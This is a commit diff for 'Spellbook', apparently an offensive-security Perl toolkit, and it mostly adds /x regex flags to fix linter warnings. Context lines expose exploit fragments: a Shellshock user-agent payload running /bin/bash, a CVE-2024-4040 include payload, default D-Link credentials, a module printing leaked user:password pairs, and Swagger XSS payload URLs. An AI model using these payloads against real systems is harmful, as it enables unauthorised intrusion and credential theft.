resolv linter warnings

htrgouvea · Jun 11, 2024 · e06d2d3 · e06d2d3
1 parent 0d72a6d
commit e06d2d3
Show file tree

Hide file tree

Showing 36 changed files with 83 additions and 73 deletions.
diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm
@@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2006_3392 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) { 
+            if ($target !~ /^http(s)?:\/\//x) { 
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm
@@ -23,7 +23,7 @@ package Spellbook::Advisory::CVE_2016_10045 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) { 
+            if ($target !~ /^http(s)?:\/\//x) { 
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm
@@ -16,7 +16,7 @@ package Spellbook::Advisory::CVE_2017_5487 {
         );
 
         if ($target) {    
-            if ($target !~ /^http(s)?:\/\//) { 
+            if ($target !~ /^http(s)?:\/\//x) { 
                 $target = "http://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm
@@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "http://$target";
             }
 
@@ -25,7 +25,7 @@ package Spellbook::Advisory::CVE_2020_9376 {
             my $request   = HTTP::Request -> new("POST", "$target/getcfg.php", $headers, $payload);
             my $response  = $userAgent -> request($request);
 
-            if (($response -> code() == 200) && ($response -> content() =~ m/DIR-610/)) {
+            if (($response -> code() == 200) && ($response -> content() =~ m/DIR-610/x)) {
                 my $dom = Mojo::DOM -> new($response -> content());
 
                 my $name = $dom -> at("entry > name") -> text();

diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm
@@ -16,7 +16,7 @@ package Spellbook::Advisory::CVE_2020_9377 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "http://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm
@@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 
@@ -35,7 +35,7 @@ package Spellbook::Advisory::CVE_2021_24891 {
                 my $inner_hash = $fingerprints -> {$key};
                 my $request = $useragent -> get($target . $inner_hash->{endpoint});
 
-                if (($request -> code() == 200) && $request -> decoded_content() =~ m/$inner_hash->{regex}/) {
+                if (($request -> code() == 200) && $request -> decoded_content() =~ m/$inner_hash->{regex}/x) {
                     push @results, $target . $inner_hash -> {endpoint};
                 }
             }

diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm
@@ -16,7 +16,7 @@ package Spellbook::Advisory::CVE_2021_41773 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) { 
+            if ($target !~ /^http(s)?:\/\//x) { 
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm
@@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2023_29489 {
         );
 
         if ($target) {    
-            if ($target !~ /^http(s)?:\/\//) { 
+            if ($target !~ /^http(s)?:\/\//x) { 
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm
@@ -20,7 +20,7 @@ package Spellbook::Advisory::CVE_2023_38646 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm
@@ -19,7 +19,7 @@ package Spellbook::Advisory::CVE_2024_4040 {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 
@@ -36,7 +36,7 @@ package Spellbook::Advisory::CVE_2024_4040 {
 
             my $cookies = $response -> header("Set-Cookie");
 
-            if ($cookies =~ /currentAuth=([^;]+)/) {                
+            if ($cookies =~ /currentAuth=([^;]+)/x) {                
                 $response = $userAgent -> post($endpoint, 
                     Content_Type => "application/x-www-form-urlencoded", 
                     Content => "command=exists&paths=<INCLUDE>$payload</INCLUDE>&c2f=$1"

diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm
@@ -15,7 +15,7 @@ package Spellbook::Advisory::Laravel_Ignition_XSS {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 
@@ -26,8 +26,8 @@ package Spellbook::Advisory::Laravel_Ignition_XSS {
 
             if (
                 $request -> code() == 500 &&
-                $request -> content() =~ m/Undefined index:/ &&
-                $request -> content() =~ m/$uuid[0]/
+                $request -> content() =~ m/Undefined index:/x &&
+                $request -> content() =~ m/$uuid[0]/x
             ) {
                 push @results, $target;
             }

diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm
@@ -4,14 +4,14 @@ package Spellbook::Core::Helper {
 
 	sub new {
 		print "
-			\rSpellbook v0.3.4
-			\rCore Commands
-			\r==============
-			\r\tCommand          Description
-			\r\t-------          -----------
-			\r\t-s, --search     List modules, you can filter by category
-			\r\t-m, --module     Define a module to use
-			\r\t-h, --help       To see help menu of a module\n\n";
+            \rSpellbook v0.3.4
+            \rCore Commands
+            \r==============
+            \r\tCommand          Description
+            \r\t-------          -----------
+            \r\t-s, --search     List modules, you can filter by category
+            \r\t-m, --module     Define a module to use
+            \r\t-h, --help       To see help menu of a module\n\n";
 
 		return 1;
 	}

diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm
@@ -14,7 +14,7 @@ package Spellbook::Exploit::CORS_Misconfig {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm
@@ -30,7 +30,9 @@ package Spellbook::Exploit::Fullchain_DLINK {
                     if (!$password) { $password = "admin"; }
 
                     if ($username) {
-                        if ($router !~ /^http(s)?:\/\//) { $router = "http://$router"; }
+                        if ($router !~ /^http(s)?:\/\//x) {
+                            $router = "http://$router";
+                        }
 
                         my $userAgent = LWP::UserAgent->new();
                         my $payload   = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";

diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm
@@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm
@@ -14,23 +14,23 @@ package Spellbook::Exploit::Mixed_Content {
         );
 
         if ($target) {
-            if ($target =~ /^http:\/\//) {
-                $target =~ s/^http:\/\///; 
+            if ($target =~ /^http:\/\//x) {
+                $target =~ s/^http:\/\///x; 
             }
 
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 
             my $userAgent = Spellbook::Core::UserAgent -> new ();
             my $request   = $userAgent -> get($target);
 
-            for (($request -> content =~ /src="([^"]+)"/g) || ($request -> content =~ /href="([^"]+)"/g)){
+            for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){
                 push @urls, $1;      
             }
 
             foreach my $url (@urls) {
-                if ($url =~ /^http?:\/\//) {
+                if ($url =~ /^http?:\/\//x) {
                     push @result, "[+] $target - $url";
                 }
             }

diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm
@@ -25,8 +25,8 @@ package Spellbook::Exploit::Pwn_DB {
                 my $dom_parse = Mojo::DOM -> new($request -> content());
                 my $content   = $dom_parse -> at("pre") -> text();
 
-                if ($content =~ /Array/) {
-                    while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mg) {
+                if ($content =~ /Array/x) {
+                    while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) {
                         if ($1 ne "donate") {
                             print "$1\@$target:$2\n";
                         } 

diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm
@@ -15,8 +15,8 @@ package Spellbook::Exploit::Redis_Unauth {
         );
 
         if ($target) {
-            if ($target =~ m/^http(s)?:\/\//) {
-                $target =~ s/^http(s)?:\/\///;
+            if ($target =~ m/^http(s)?:\/\//x) {
+                $target =~ s/^http(s)?:\/\///x;
             }
 
             try {

diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm
@@ -4,6 +4,7 @@ package Spellbook::Exploit::Reflected_XSS {
     use Mojo::UserAgent;
     use Mojo::Parameters;
     use UUID::Tiny ':std';
+    use Try::Tiny;
 
     sub new {
         my ($self, $parameters) = @_;
@@ -25,20 +26,23 @@ package Spellbook::Exploit::Reflected_XSS {
 
                 foreach my $name (@{$params -> names}) {
                     my $uuid    = create_uuid_as_string(4);
-                    my $payload = "$uuid"; # i need change this payload to contain a javascript or html tag
+                    my $payload = $uuid; # i need change this payload to contain a javascript or html tag
                     my $value   = $params -> param($name);
 
                     $params -> remove($name);
                     $params -> append($name, $payload);
-                    $parsed_url -> query($params);
 
-                    my $response = $useragent -> get($parsed_url) -> result();
+                    $parsed_url -> query($params);
+
+                    try {
+                        my $response = $useragent -> get($parsed_url) -> result();
 
-                    if ($response -> is_success()) {
-                        my $content = $response -> body();
+                        if ($response -> is_success()) {
+                            my $content = $response -> body();
 
-                        if ($content =~ /$payload/g) {
-                            push @result, $parsed_url;
+                            if ($content =~ /$payload/gx) {
+                                push @result, $parsed_url;
+                            }
                         }
                     }
                 }

diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm
@@ -14,14 +14,14 @@ package Spellbook::Exploit::S3_Bucket_Takeover {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 
             my $userAgent = Spellbook::Core::UserAgent -> new();
             my $request = $userAgent -> get($target);
 
-            if ($request -> code() == 404 && $request-> content() =~ m/Code: NoSuchBucket/) {
+            if ($request -> code() == 404 && $request-> content() =~ m/Code: NoSuchBucket/x) {
                 push @result, $target;
             }
 

diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm
@@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock {
                 agent => "() { :; }; echo; echo; /bin/bash -c 'ls'"
             );
 
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm
@@ -16,7 +16,7 @@ package Spellbook::Exploit::Subdomain_Takeover {
         );
 
         if ($target) {
-            $target =~ s/^http(s)?:\/\///;
+            $target =~ s/^http(s)?:\/\///x;
 
             my $resolv = Net::DNS::Resolver -> new();
             my $reply  = $resolv -> search($target);
@@ -43,7 +43,7 @@ package Spellbook::Exploit::Subdomain_Takeover {
                         );
 
                         foreach (%hashes) {
-                            if ($rr -> cname() =~ m/$_/) {
+                            if ($rr -> cname() =~ m/$_/x) {
                                 my $useragent = Spellbook::Core::UserAgent -> new();
                                 my $request   = $useragent -> get($target);
 

diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm
@@ -14,11 +14,11 @@ package Spellbook::Exploit::Swagger_XSS {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 
-            $target =~ s/\/$//;
+            $target =~ s/\/$//x;
             my $useragent = Spellbook::Core::UserAgent -> new();
 
             my @paths = (
@@ -32,10 +32,10 @@ package Spellbook::Exploit::Swagger_XSS {
                 my $request = $useragent -> get("$target$path");
 
                 if ($request -> code() == 200) {
-                    if ($request -> content() =~ /<title>(.*)<\/title>/) {
+                    if ($request -> content() =~ /<title>(.*)<\/title>/x) {
                         my $title = $1;
 
-                        if ($title =~ /Swagger UI/) {
+                        if ($title =~ /Swagger UI/x) {
                             my @payloads = (
                                 "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml",
                                 "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json"

diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm
@@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) {
+            if ($target !~ /^http(s)?:\/\//x) {
                 $target = "https://$target";
             }
 

diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm
@@ -14,15 +14,15 @@ package Spellbook::Helper::Host_Normalization {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) { 
+            if ($target !~ /^http(s)?:\/\//x) { 
                 $target = "http://$target";
             }
 
             my $uri  = URI::URL -> new($target);
             my $host = $uri -> host();
 
-            $host =~ s/^www\.//i;
-            $host =~ s/^\*.//;
+            $host =~ s/^www\.//ix;
+            $host =~ s/^\*.//x;
 
             return lc($host);
 

diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm
@@ -7,7 +7,7 @@ package Spellbook::Helper::Scope {
 
     sub new {
         my ($self, $parameters) = @_;
-        my ($help, $scope, $information, $entrypoint, $save, $keep, @results, @response);
+        my ($help, $scope, $information, $entrypoint, $save, $keep, @results);
 
         my $threads = 10;
 

diff --git a/lib/Spellbook/Mail/Checker.pm b/lib/Spellbook/Mail/Checker.pm
@@ -1,4 +1,4 @@
-package Spellbook {
+package Spellbook::Mail::Checker {
     use strict;
     use warnings;